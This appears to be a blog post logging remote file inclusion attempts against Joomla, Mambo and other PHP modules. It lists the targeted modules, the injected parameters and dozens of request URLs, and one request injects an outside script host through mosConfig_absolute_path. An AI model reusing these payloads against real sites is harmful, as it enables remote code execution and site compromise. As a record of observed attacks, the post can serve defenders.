Found vuln mosConfig_absolute_path injection 03-04-08

Script names:
AutoStand (Joomla module)
Carousel Flash Image Gallery (Joomla module)
Coppermine Photo Gallery component (Mambo module)
CropImage (Mambo module)
ExtCalendar (Mambo module)
FlatMenu (Mambo module)
JoomlaPack (Joomla module)
MOSMedia Lite (Mambo module)
MyCalendar
NFN Address Book (Mambo module)
swMenuFree (Mambo module)
TaskHopper (Joomla module)
Tour De France Pool (Joomla module)
VisoHotlink
WebCalendar
zOOm Media Gallery
?

Parameters used for code injection attempts:
cpage=
go=
highlight=
includedir=
j=
mosConfig_absolute_path=
setup[use_category]=

Script injection:

http://claroline.lct-net.cl/id?


URLs requested:
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_mambatstaff&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_mgm&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_pollxt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_typedcontent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_hashcash&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_htmlarea3_xtd-c&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jcs&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jd-wiki&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jooml&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_joomla_flash_uploader&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_madeira&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_mambots&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_mp3_allopass&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pcchess&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pccookbook&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_performs&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pollxt&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_serverstat&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_swmenupro&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=
--------------------------------------------------------------------------------------------
//index.php?option=com_alphacontent&section=6&cat=15&task=view&id=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_extended_registration&Itemid=&mosConfig_absolute_path=http://claroline.lct-net.cl/id?
--------------------------------------------------------------------------------------------
//index.php?option=com_fireboard&Itemid=27&func=view&catid=2&id=43//?option=com_babackup&task=view&id=27&Itemid=39//?option=com_babackup=&sectionid=&id=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/germancrawler//include/print_category.php?setup[use_category]=
--------------------------------------------------------------------------------------------
/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?go=
--------------------------------------------------------------------------------------------
/index.php?j=
--------------------------------------------------------------------------------------------
/index.php?option=com_contentt&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?option=com_facileforms&cpage=
--------------------------------------------------------------------------------------------
/index.php?option=com_flyspray&cpage=
--------------------------------------------------------------------------------------------
/index.php?option=com_hashcash&cpage=
--------------------------------------------------------------------------------------------
/turkishcrawler//include/print_category.php?setup[use_category]=
--------------------------------------------------------------------------------------------
/user-list/english/detailed/listing961.html//tools/send_reminders.php?noSet=0&includedir=
Reviewed by Furkan Samadha on 10:14 PM